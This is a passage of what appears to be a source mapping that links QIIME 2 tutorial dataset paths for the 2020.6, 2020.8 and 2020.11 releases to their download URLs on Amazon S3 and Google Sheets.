'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.6/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.6/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.6/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.6/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/faith_pd_vector.qza',
'2020.6/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/rep-seqs.qza',
'2020.6/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/taxonomy.qza',
'2020.6/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.6/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/otu-clustering/seqs.fna',
'2020.6/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/otu-clustering/85_otus.qza',
'2020.6/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/pd-mice/animal_distal_gut.qza',
'2020.6/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.6/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/pd-mice/manifest',
'2020.6/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.6/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/pd-mice/ref_tax.qza',
'2020.6/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.6/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.6/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/query-seqs.qza',
'2020.6/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/reference-seqs.qza',
'2020.6/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/quality-control/query-table.qza',
'2020.6/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/read-joining/atacama-seqs.qza',
'2020.6/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/read-joining/fj-joined.zip',
'2020.6/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/sample-classifier/atacama-table.qza',
'2020.6/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.6/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.6/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.6/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.6/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.6/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/phylogeny/rep-seqs.qza',
'2020.6/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/utilities/faith-pd-vector.qza',
'2020.6/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/utilities/jaccard-pcoa.qza',
'2020.6/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.6/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.6/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/19rReXhmTT-UXPw4qDzH3bIGZ3xE2EaWQ4AX6w78E19k/edit?usp=sharing',
'2020.6/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/19rReXhmTT-UXPw4qDzH3bIGZ3xE2EaWQ4AX6w78E19k/export?gid=0&format=tsv',
## Moving Pictures
'2020.6/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/1zCErEpDf5JCXoMmDQWYToIPn07vWdsyKg4UbFc2JgLA/edit?usp=sharing',
'2020.6/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1zCErEpDf5JCXoMmDQWYToIPn07vWdsyKg4UbFc2JgLA/export?gid=0&format=tsv',
## Atacama
'2020.6/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1I2UPNUSJrULSjLa42Dp1cAjvtgEEmK9MAgQyAMBdZ90/edit?usp=sharing',
'2020.6/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1I2UPNUSJrULSjLa42Dp1cAjvtgEEmK9MAgQyAMBdZ90/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.6/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/18tYREhE5HcRVTCX3740KXeBOTL7duf_7EeU3MpF7DlE/edit?usp=sharing',
'2020.6/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vR6EuKUDh2208iwVW1QZ3LLf_QQGwAYB44mhd84BxIIcOLI7aRxNH4m2bS3bDwr6hGjUpDPBfOeoXyN/pub?gid=1303657428&single=true&output=tsv',
## FMT Cdiff
'2020.6/tutorials/fmt-cdiff-khanna/sample_metadata':
'https://docs.google.com/spreadsheets/d/1Kz6pYslJwbZ75mVcuDkJ6RK9KA0Y205x2958DMBtp2w/edit?usp=sharing',
'2020.6/tutorials/fmt-cdiff-khanna/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vTv3HpYXSClxj1jMoFypgKZKMOjdRQ76JhPHaXvQk6-rgnbh4kBGDZyEPjUwhIj-s59j2EVIOGdA2Kz/pub?gid=283132897&single=true&output=tsv',
## PD Mice
'2020.6/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1y8__mN4f58D2JCpz2X6mEVQlDYRXnvxhl5A5MPy7nAM/edit?usp=sharing',
'2020.6/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vSrf5DfuqbDrn2KgX_A2L5oxrGd2-gWPCGoJlvJKsQa1qQai08-C4HHHI7d_sSM_Sr_OcBJqUjJJLUm/pub?gid=1509704122&single=true&output=tsv',
# 2020.8
'2020.8/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.8/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/gg-13-8-99-nb-classifier.qza',
'2020.8/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/sepp-refs-gg-13-8.qza',
'2020.8/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/sepp-refs-silva-128.qza',
'2020.8/common/silva-138-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/silva-138-99-515-806-nb-classifier.qza',
'2020.8/common/silva-138-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/common/silva-138-99-nb-classifier.qza',
'2020.8/common/silva-138-99-seqs-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-seqs-515-806.qza',
'2020.8/common/silva-138-99-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-seqs.qza',
'2020.8/common/silva-138-99-tax-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-tax-515-806.qza',
'2020.8/common/silva-138-99-tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/common/silva-138-99-tax.qza',
'2020.8/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.8/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.8/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.8/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.8/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.8/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.8/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/chimera/atacama-table.qza',
'2020.8/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/chimera/atacama-rep-seqs.qza',
'2020.8/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/exporting/feature-table.qza',
'2020.8/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/exporting/unrooted-tree.qza',
'2020.8/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/distance-matrix.qza',
'2020.8/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/table.qza',
'2020.8/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/taxonomy.qza',
'2020.8/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/filtering/sequences.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.8/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.8/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.8/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.8/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/gneiss/sample-metadata.tsv',
'2020.8/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/gneiss/table.qza',
'2020.8/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/gneiss/taxa.qza',
'2020.8/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/aligned-sequences.fna',
'2020.8/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/casava-18-paired-end-demultiplexed.zip',
'2020.8/tutorials/importing/casava-18-single-end-demultiplexed.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/casava-18-single-end-demultiplexed.zip',
'2020.8/tutorials/importing/feature-table-v100.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/feature-table-v100.biom',
'2020.8/tutorials/importing/feature-table-v210.biom':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/feature-table-v210.biom',
'2020.8/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/importing/muxed-se-barcode-in-seq.fastq.gz',
'2020.8/tutorials/importing/pe-64-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/pe-64-manifest',
'2020.8/tutorials/importing/pe-64.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/pe-64.zip',
'2020.8/tutorials/importing/se-33-manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/se-33-manifest',
'2020.8/tutorials/importing/se-33.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/se-33.zip',
'2020.8/tutorials/importing/sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/sequences.fna',
'2020.8/tutorials/importing/unrooted-tree.tre':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/unrooted-tree.tre',
'2020.8/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/muxed-pe-barcode-in-seq/forward.fastq.gz',
'2020.8/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/importing/muxed-pe-barcode-in-seq/reverse.fastq.gz',
'2020.8/tutorials/longitudinal/ecam_table_taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/ecam_table_taxa.qza',
'2020.8/tutorials/longitudinal/ecam_shannon.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/ecam_shannon.qza',
'2020.8/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/unweighted_unifrac_distance_matrix.qza',
'2020.8/tutorials/longitudinal/ecam_table_maturity.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/longitudinal/ecam_table_maturity.qza',
'2020.8/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/moving-pictures/emp-single-end-sequences/barcodes.fastq.gz',
'2020.8/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/moving-pictures/emp-single-end-sequences/sequences.fastq.gz',
'2020.8/tutorials/metadata/faith_pd_vector.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/faith_pd_vector.qza',
'2020.8/tutorials/metadata/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/rep-seqs.qza',
'2020.8/tutorials/metadata/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/taxonomy.qza',
'2020.8/tutorials/metadata/unweighted_unifrac_pcoa_results.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/metadata/unweighted_unifrac_pcoa_results.qza',
'2020.8/tutorials/otu-clustering/seqs.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/otu-clustering/seqs.fna',
'2020.8/tutorials/otu-clustering/85_otus.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/otu-clustering/85_otus.qza',
'2020.8/tutorials/pd-mice/animal_distal_gut.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/pd-mice/animal_distal_gut.qza',
'2020.8/tutorials/pd-mice/demultiplexed_seqs.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/pd-mice/demultiplexed_seqs.zip',
'2020.8/tutorials/pd-mice/manifest':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/pd-mice/manifest',
'2020.8/tutorials/pd-mice/ref_seqs_v4.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/pd-mice/ref_seqs_v4.qza',
'2020.8/tutorials/pd-mice/ref_tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/pd-mice/ref_tax.qza',
'2020.8/tutorials/quality-control/qc-mock-3-expected.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/qc-mock-3-expected.qza',
'2020.8/tutorials/quality-control/qc-mock-3-observed.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/qc-mock-3-observed.qza',
'2020.8/tutorials/quality-control/query-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/query-seqs.qza',
'2020.8/tutorials/quality-control/reference-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/reference-seqs.qza',
'2020.8/tutorials/quality-control/query-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/quality-control/query-table.qza',
'2020.8/tutorials/read-joining/atacama-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/read-joining/atacama-seqs.qza',
'2020.8/tutorials/read-joining/fj-joined.zip':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/read-joining/fj-joined.zip',
'2020.8/tutorials/sample-classifier/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/sample-classifier/atacama-table.qza',
'2020.8/tutorials/sample-classifier/moving-pictures-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/sample-classifier/moving-pictures-table.qza',
'2020.8/tutorials/training-feature-classifiers/85_otu_taxonomy.txt':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/training-feature-classifiers/85_otu_taxonomy.txt',
'2020.8/tutorials/training-feature-classifiers/85_otus.fasta':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/training-feature-classifiers/85_otus.fasta',
'2020.8/tutorials/training-feature-classifiers/rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.8/tutorials/training-feature-classifiers/rep-seqs.qza',
'2020.8/tutorials/phylogeny/rep-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/phylogeny/rep-seqs.qza',
'2020.8/tutorials/utilities/faith-pd-vector.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/utilities/faith-pd-vector.qza',
'2020.8/tutorials/utilities/jaccard-pcoa.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/utilities/jaccard-pcoa.qza',
'2020.8/tutorials/utilities/taxa-barplot.qzv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.8/tutorials/utilities/taxa-barplot.qzv',
# Sample Metadata (hosted on Google Sheets)
## FMT
'2020.8/tutorials/fmt/sample_metadata':
'https://docs.google.com/spreadsheets/d/1MEiItba3d_usUXYqWUhJ_Fk2tR4PgRbqbzPEmqssup8/edit?usp=sharing',
'2020.8/tutorials/fmt/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1MEiItba3d_usUXYqWUhJ_Fk2tR4PgRbqbzPEmqssup8/export?gid=0&format=tsv',
## Moving Pictures
'2020.8/tutorials/moving-pictures/sample_metadata':
'https://docs.google.com/spreadsheets/d/1_JV-bCWpH2JBH-SEgMRLcQn5Sn8nVvuFnn4G50Jc72M/edit?usp=sharing',
'2020.8/tutorials/moving-pictures/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1_JV-bCWpH2JBH-SEgMRLcQn5Sn8nVvuFnn4G50Jc72M/export?gid=0&format=tsv',
## Atacama
'2020.8/tutorials/atacama-soils/sample_metadata':
'https://docs.google.com/spreadsheets/d/1OZtpMzJ0vRhRk_1DA3nYuhA-OLfo6MZYHIHAqRbKVB4/edit?usp=sharing',
'2020.8/tutorials/atacama-soils/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/1OZtpMzJ0vRhRk_1DA3nYuhA-OLfo6MZYHIHAqRbKVB4/export?gid=0&format=tsv',
## The following tutorials are the "weird" ones, they use the *new* docs sharing menu, via "File -> Publish to the Web" dialog for TSV export.
## Longitudinal
'2020.8/tutorials/longitudinal/sample_metadata':
'https://docs.google.com/spreadsheets/d/1QcESE0rJh8ER5AiQSxpdgyVkedVW6JeXaYYG6TCnoEI/edit?usp=sharing',
'2020.8/tutorials/longitudinal/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vT2v_BqLUKQMl3aS6D18Ny6rW2ftX0NvwRjD4v-JGXAMMraMfO0VmssCnKdyORerWrXQ6cYmCLb4jSi/pub?gid=1303657428&single=true&output=tsv',
## PD Mice
'2020.8/tutorials/pd-mice/sample_metadata':
'https://docs.google.com/spreadsheets/d/1SDBD5gYFy2ck_vZXdj2oBix5XCtnWMPVbs0aaLcdccw/edit?usp=sharing',
'2020.8/tutorials/pd-mice/sample_metadata.tsv':
'https://docs.google.com/spreadsheets/d/e/2PACX-1vRe42IpLxZI1V5gtkuej2vuO31tyu0NCRbjECXx8SuQcarHhEqFFyluwmU72BesGWfEH-IX_tXGs8FX/pub?gid=1509704122&single=true&output=tsv',
# 2020.11
'2020.11/common/gg-13-8-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/gg-13-8-99-515-806-nb-classifier.qza',
'2020.11/common/gg-13-8-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/gg-13-8-99-nb-classifier.qza',
'2020.11/common/sepp-refs-gg-13-8.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/sepp-refs-gg-13-8.qza',
'2020.11/common/sepp-refs-silva-128.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/sepp-refs-silva-128.qza',
'2020.11/common/silva-138-99-515-806-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/silva-138-99-515-806-nb-classifier.qza',
'2020.11/common/silva-138-99-nb-classifier.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/common/silva-138-99-nb-classifier.qza',
'2020.11/common/silva-138-99-seqs-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-seqs-515-806.qza',
'2020.11/common/silva-138-99-seqs.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-seqs.qza',
'2020.11/common/silva-138-99-tax-515-806.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-tax-515-806.qza',
'2020.11/common/silva-138-99-tax.qza':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/common/silva-138-99-tax.qza',
'2020.11/tutorials/atacama-soils/10p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/10p/barcodes.fastq.gz',
'2020.11/tutorials/atacama-soils/10p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/10p/forward.fastq.gz',
'2020.11/tutorials/atacama-soils/10p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/10p/reverse.fastq.gz',
'2020.11/tutorials/atacama-soils/1p/barcodes.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/1p/barcodes.fastq.gz',
'2020.11/tutorials/atacama-soils/1p/forward.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/1p/forward.fastq.gz',
'2020.11/tutorials/atacama-soils/1p/reverse.fastq.gz':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/atacama-soils/1p/reverse.fastq.gz',
'2020.11/tutorials/chimera/atacama-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/chimera/atacama-table.qza',
'2020.11/tutorials/chimera/atacama-rep-seqs.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/chimera/atacama-rep-seqs.qza',
'2020.11/tutorials/exporting/feature-table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/exporting/feature-table.qza',
'2020.11/tutorials/exporting/unrooted-tree.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/exporting/unrooted-tree.qza',
'2020.11/tutorials/filtering/distance-matrix.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/distance-matrix.qza',
'2020.11/tutorials/filtering/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/table.qza',
'2020.11/tutorials/filtering/taxonomy.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/taxonomy.qza',
'2020.11/tutorials/filtering/sequences.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/filtering/sequences.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-1-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-1-10p.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-1-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-1-1p.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-2-10p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-2-10p.qza',
'2020.11/tutorials/fmt/fmt-tutorial-demux-2-1p.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/fmt/fmt-tutorial-demux-2-1p.qza',
'2020.11/tutorials/fmt-cdiff-khanna/manifest.csv':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/fmt-cdiff-khanna/manifest.csv',
'2020.11/tutorials/fmt-cdiff-khanna/sequence_files.zip':
'https://qiime2-data.s3-us-west-2.amazonaws.com/2020.11/tutorials/fmt-cdiff-khanna/sequence_files.zip',
'2020.11/tutorials/gneiss/sample-metadata.tsv':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/gneiss/sample-metadata.tsv',
'2020.11/tutorials/gneiss/table.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/gneiss/table.qza',
'2020.11/tutorials/gneiss/taxa.qza':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/gneiss/taxa.qza',
'2020.11/tutorials/importing/aligned-sequences.fna':
'https://s3-us-west-2.amazonaws.com/qiime2-data/2020.11/tutorials/importing/aligned-sequences.fna',
'2020.11/tutorials/importing/casava-18-paired-end-demultiplexed.zip':
